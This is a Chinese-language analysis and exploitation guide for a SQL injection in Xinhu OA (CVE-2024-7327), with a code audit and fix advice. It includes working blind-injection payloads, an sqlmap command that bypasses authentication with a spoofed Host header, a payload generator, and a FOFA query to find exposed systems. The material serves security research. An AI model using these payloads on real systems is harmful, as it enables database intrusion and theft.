信呼OA nickName SQL注入漏洞(XVE-2024-19304 & CVE-2024-7327) 深入分析与利用指南<\/h1>

1. 漏洞概述<\/h2>

1.1 基本信息<\/h3>

漏洞名称<\/strong>: 信呼OA nickName SQL注入漏洞<\/li>
漏洞编号<\/strong>: XVE-2024-19304 & CVE-2024-7327<\/li>
影响系统<\/strong>: 信呼OA办公系统<\/li>
影响版本<\/strong>: v2.6.2之前的所有版本<\/li>
漏洞类型<\/strong>: SQL注入<\/li>

漏洞位置<\/strong>: \/webmain\/task\/openapi\/openmodhetongAction.php<\/code>文件的dataAction<\/code>函数<\/li> <\/ul> 1.2 漏洞描述<\/h3> 该漏洞由于未对用户可控的nickName<\/code>参数进行有效过滤，导致攻击者可构造恶意SQL语句，从而执行任意数据库操作。漏洞点位于开放API接口，且缺乏有效的鉴权机制，使得攻击者可以相对容易地利用此漏洞。<\/p> 2. 环境搭建<\/h2> 2.1 准备工作<\/h3> 下载信呼OA v2.6.2版本： https:\/\/xinhu-1251238447.file.myqcloud.com\/file\/xinhu_utf8_v2.6.2.zip <\/code><\/pre> <\/li> 安装小皮面板或其他PHP环境<\/li> 准备MySQL数据库<\/li> <\/ol> 2.2 安装步骤<\/h3> 解压下载的zip文件到网站根目录<\/li> 访问http:\/\/xinhu:8000\/<\/code>开始安装<\/li> 创建MySQL数据库rockxinhu<\/code><\/li> 导入数据库文件webmain\/install\/rockxinhu.sql<\/code><\/li> 到信呼官网注册并获取key<\/li> 返回安装页面，配置数据库连接信息和官网key<\/li> 完成安装<\/li> <\/ol> 3. 漏洞分析<\/h2> 3.1 漏洞位置<\/h3> 文件路径: \/webmain\/task\/openapi\/openmodhetongAction.php<\/code><\/li> 漏洞函数: dataAction<\/code><\/li> 关键参数: nickName<\/code><\/li> <\/ul> 3.2 漏洞原理<\/h3> nickName<\/code>参数通过GET方式传递<\/li> 参数值经过base64解码后直接拼接到SQL查询中<\/li> 由于缺乏有效的过滤和参数化查询，导致SQL注入<\/li> <\/ol> 3.3 代码审计关键点<\/h3> 参数传递流程<\/strong>:<\/p> index.php<\/code>处理URL路由<\/li> 参数通过m<\/code>(模块)、d<\/code>(目录)、a<\/code>(动作)指定访问路径<\/li> nickName<\/code>参数直接通过GET方式获取<\/li> <\/ul> <\/li> SQL注入点分析<\/strong>:<\/p> $nickName =<\/span> base64_decode<\/span>($this-><\/span>get<\/span>('nickName'<\/span>)); <\/span><\/span>$uarr['name'<\/span>] =<\/span> $nickName; <\/span><\/span>$this-><\/span>record<\/span>($uarr); <\/span><\/span><\/code><\/pre> nickName<\/code>参数经过base64解码后直接放入数组<\/li> 数组直接传递给record<\/code>方法进行数据库操作<\/li> <\/ul> <\/li> 过滤机制分析<\/strong>:<\/p> 虽然系统有__construct<\/code>魔术方法对关键字进行过滤<\/li> 但由于参数经过base64编码，过滤机制被绕过<\/li> jmuncode<\/code>方法中的单引号转义对base64编码的payload无效<\/li> <\/ul> <\/li> <\/ol> 3.4 鉴权机制分析<\/h3> 继承链分析<\/strong>:<\/p> openmodhetongClassAction<\/code> → openapiAction<\/code> → mainAction<\/code><\/li> mainAction<\/code>的__construct<\/code>方法自动调用initAction<\/code><\/li> <\/ul> <\/li> 鉴权检查<\/strong>:<\/p> openapiAction<\/code>中的initAction<\/code>方法检查openkey<\/code><\/li> 但存在以下绕过条件： $this->keycheck<\/code>为false<\/li> 主机是127.0.0.1<\/li> 主机IP包含192.168<\/li> 服务端未配置openkey<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 4. 漏洞利用<\/h2> 4.1 手工验证POC<\/h3> GET \/index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP\/1.1 Host: 127.0.0.1 <\/code><\/pre> 其中：<\/p> MScgYW5kIHNsZWVwKDUpIw==<\/code>是1' and sleep(5)#<\/code>的base64编码<\/li> 成功利用表现为响应延迟5秒<\/li> <\/ul> 4.2 SQLMap自动化利用<\/h3> python sqlmap.py -u "http:\/\/xinhu:8000\/index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MS"<\/span> -p nickName --tamper=<\/span>base64encode --host=<\/span>"127.0.0.1"<\/span> --batch --dbms=<\/span>mysql --level=<\/span>3<\/span> --risk=<\/span>3<\/span> <\/span><\/span><\/code><\/pre>重要参数说明<\/strong>:<\/p> --tamper=base64encode<\/code>: 对payload进行base64编码<\/li> --host="127.0.0.1"<\/code>: 绕过openkey检查<\/li> --level=3 --risk=3<\/code>: 因为调用的是record方法(INSERT\/UPDATE操作)<\/li> <\/ul> 4.3 手工注入技术<\/h3> 4.3.1 数据库名枚举<\/h4> 1' AND IF(SUBSTRING(DATABASE(),1,1)='r',SLEEP(5),1)# <\/code><\/pre> base64编码后：<\/p> MScgQU5EIElGKFNVQlNUUklORyhEQVRBQkFTRSgpLDEsMSk9J3InLFNMRUVQKDUpLDEpIw== <\/code><\/pre> 4.3.2 Burp Intruder爆破配置<\/h4> 生成字典：<\/p> def<\/span> generate_sqli_payloads<\/span>(): <\/span><\/span> characters =<\/span> 'abcdefghijklmnopqrstuvwxyz'<\/span> <\/span><\/span> payloads =<\/span> [] <\/span><\/span> for<\/span> position in<\/span> range(1<\/span>, 11<\/span>): <\/span><\/span> for<\/span> char in<\/span> characters: <\/span><\/span> payload =<\/span> f<\/span>"1' AND IF(SUBSTRING(DATABASE(),<\/span>{<\/span>position}<\/span>,1)='<\/span>{<\/span>char}<\/span>',SLEEP(3),1)#"<\/span> <\/span><\/span> payloads.<\/span>append(payload) <\/span><\/span> return<\/span> payloads <\/span><\/span><\/code><\/pre><\/li> Burp配置：<\/p> Payload类型：Simple list<\/li> 取消URL编码<\/li> 添加Payload Processing规则：Base64-encode<\/li> 设置单线程（避免干扰时间判断）<\/li> <\/ul> <\/li> <\/ol> 5. 漏洞修复建议<\/h2> 升级版本<\/strong>:<\/p> 升级到v2.6.2或更高版本<\/li> <\/ul> <\/li> 临时修复措施<\/strong>:<\/p> 对nickName<\/code>参数进行严格过滤<\/li> 使用参数化查询或预处理语句<\/li> 加强openkey<\/code>的校验机制<\/li> 限制API接口的访问权限<\/li> <\/ul> <\/li> 代码层面修复<\/strong>:<\/p> 在openmodhetongAction.php<\/code>中添加参数过滤<\/li> 实现严格的输入验证<\/li> 使用ORM或安全的数据库查询方法<\/li> <\/ul> <\/li> <\/ol> 6. 网络测绘<\/h2> 使用FOFA语法搜索受影响系统：<\/p> app="信呼-OA系统" <\/code><\/pre> 7. 参考资料<\/h2> FreeBuf原创文章<\/a><\/li> CVE-2024-7327详情<\/a><\/li> CVE官方记录<\/a><\/li> 其他技术分析<\/a><\/li> <\/ol> 8. 漏洞利用注意事项<\/h2> 法律合规<\/strong>: 未经授权的测试可能违法，务必获得书面授权<\/li> 影响评估<\/strong>: 该漏洞可导致数据泄露、篡改或系统沦陷<\/li> 测试环境<\/strong>: 建议在隔离环境中进行漏洞验证<\/li> 时间盲注<\/strong>: 注意网络延迟对时间盲注判断的影响<\/li> 绕过技巧<\/strong>: 实际环境中可能需要尝试多种Host头绕过方式<\/li> <\/ol> 通过本文的详细分析，安全研究人员可以全面了解该漏洞的原理、利用方法和防御措施，为信呼OA系统的安全防护提供有力支持。<\/p>